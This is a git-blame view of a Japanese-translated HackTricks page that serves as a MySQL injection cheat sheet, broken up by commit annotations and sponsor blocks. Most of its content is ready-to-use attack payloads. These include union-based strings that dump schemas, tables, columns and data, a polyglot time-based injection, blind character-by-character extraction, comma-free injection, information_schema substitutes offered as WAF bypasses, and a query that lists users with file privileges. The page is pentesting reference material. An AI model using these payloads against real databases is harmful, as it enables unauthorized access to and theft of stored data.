Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/sql-injection/mysql-injection/README.md

182 lines
11 KiB
Markdown
Raw Normal View History

Translated to Japanese
2023-07-07 23:42:27 +00:00
# MySQLインジェクション
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有**するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
GitBook: [#3622] No subject
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
[**RootedCON**](https://www.rootedcon.com/)は**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの1つです。**技術知識の促進を使命**とするこの会議は、あらゆる分野のテクノロジーとサイバーセキュリティ専門家にとっての熱い出会いの場です。
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
GitBook: [#3622] No subject
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
## Comments
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```sql
-- MYSQL Comment
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */
/*!32302 10*/ Comment for MySQL version 3.23.02
```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
## 興味深い関数
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Japanese
2023-07-07 23:42:27 +00:00
### Mysqlの確認:
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)
```
Translated to Japanese
2023-07-07 23:42:27 +00:00
### 便利な関数
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```sql
SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE>
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
```
Translated to Japanese
2023-07-07 23:42:27 +00:00
## すべてのインジェクション
```sql
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
Translated to Japanese
2023-07-07 23:42:27 +00:00
## フロー
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
"現代"の**MySQL**のバージョンでは、"_**information\_schema.tables**_"を"_**mysql.innodb\_table\_stats**_**"**に置き換えることができますこれはWAFをバイパスするのに役立つかもしれません
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```sql
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
```
Translated to Japanese
2023-07-07 23:42:27 +00:00
### **1つの値のみ**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
* `group_concat()`
* `Limit X,1`
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
### **ブラインド one by one**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Japanese
2023-07-07 23:42:27 +00:00
* `substr(version(),X,1)='r'`または`substring(version(),X,1)=0x70`または`ascii(substr(version(),X,1))=112`
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
* `mid(version(),X,1)='5'`
Translated to Japanese
2023-07-07 23:42:27 +00:00
### **ブラインド追加**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
* `LPAD(version(),1...lenght(version()),'1')='asd'...`
* `RPAD(version(),1...lenght(version()),'1')='asd'...`
* `SELECT RIGHT(version(),1...lenght(version()))='asd'...`
* `SELECT LEFT(version(),1...lenght(version()))='asd'...`
* `SELECT INSTR('foobarbar', 'fo...')=1`
Translated to Japanese
2023-07-07 23:42:27 +00:00
## 列の数を検出
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
単純なORDERを使用
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
order by 1
order by 2
order by 3
...
order by XXX
UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...
```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
## MySQLユニオンベース
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```sql
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
```
GitBook: [#3622] No subject
2022-10-25 15:56:49 +00:00
## SSRF
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
**[**Mysqlインジェクションを悪用してSSRFを取得するための異なるオプションをここで学ぶ**](mysql-ssrf.md)**。**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
## WAFバイパストリック
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
### Information\_schemaの代替案
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
"現代の" **MySQL** のバージョンでは、_**information\_schema.tables**_ を _**mysql.innodb\_table\_stats**_ または _**sys.x$schema\_flattened\_keys**_ または **sys.schema_table_statistics** に置き換えることができることを覚えておいてください。
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
### コンマなしのMySQLインジェクション
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
コンマを使用せずに2つの列を選択する[https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma))。
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
### 列名なしで値を取得する
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
もしテーブルの名前はわかっているけど、テーブル内の列名がわからない場合、次のようなコマンドを実行して列の数を見つけることができます:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1); # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
仮定して、2つの列があるとします最初の列がIDで、もう1つがフラグです、フラグの内容を1文字ずつ試すことでブルートフォース攻撃を試みることができます
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```bash
# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);
```
Translated to Japanese
2023-07-07 23:42:27 +00:00
詳細は[https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)にあります。
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Japanese
2023-07-07 23:42:27 +00:00
### MySQLの歴史
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
**sys.x$statement\_analysis**テーブルを読み取ることで、MySQL内で他の実行を見ることができます。
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
### バージョンの代替案
GitBook: [#2777] gitbookissooooo slow I cannot write
2021-10-18 11:21:18 +00:00
```
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
mysql> select @@innodb_version;
mysql> select @@version;
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
mysql> select version();
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
## その他のMYSQLインジェクションガイド
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)]
## 参考文献
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
GitBook: [#3622] No subject
2022-10-25 15:56:49 +00:00
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
[**RootedCON**](https://www.rootedcon.com/)は**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの一つです。**技術知識の促進を使命**とするこの会議は、あらゆる分野の技術とサイバーセキュリティ専門家にとっての熱い出会いの場です。
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
GitBook: [#3622] No subject
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
GitBook: [#3622] No subject
2022-10-25 15:56:49 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
update twitter
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil
2024-02-08 04:49:53 +00:00
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke
2024-02-06 03:40:01 +00:00
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink